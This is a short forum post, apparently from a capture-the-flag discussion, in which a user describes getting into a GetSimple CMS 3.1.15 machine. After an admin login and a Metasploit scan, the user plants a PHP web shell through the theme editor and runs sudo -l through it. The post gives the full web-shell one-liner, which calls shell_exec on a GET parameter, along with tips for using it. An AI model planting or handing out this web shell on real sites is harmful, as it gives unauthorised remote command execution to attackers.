Ok so here is one Interesting thing i got … I was able to spawn a web shell using the Following steps –
.
.
1.i was able to login as admin through the page
2.then i started the metasploit scanned and navigated the whole System for like 3-4 Days
3.then i started googling again and found out something about GetSimple cms 3.1.15 Vulnerablity that is in theme-editor
4. I visited the theme editor and tried to edit the php files there and was able to spawn a webshell using the One liner - <,?,p,h,p, e,c,h,o, s,h,e,l,l,_e,x,e,c,($_GET[‘e’].’ 2>&1’); ?>
(remove the ,(commas) I had to use them or the forum was glitching)
5.then i tried the sudo -l command and it worked …(remember to url-encode spaces to run commands)
this is my progress until now…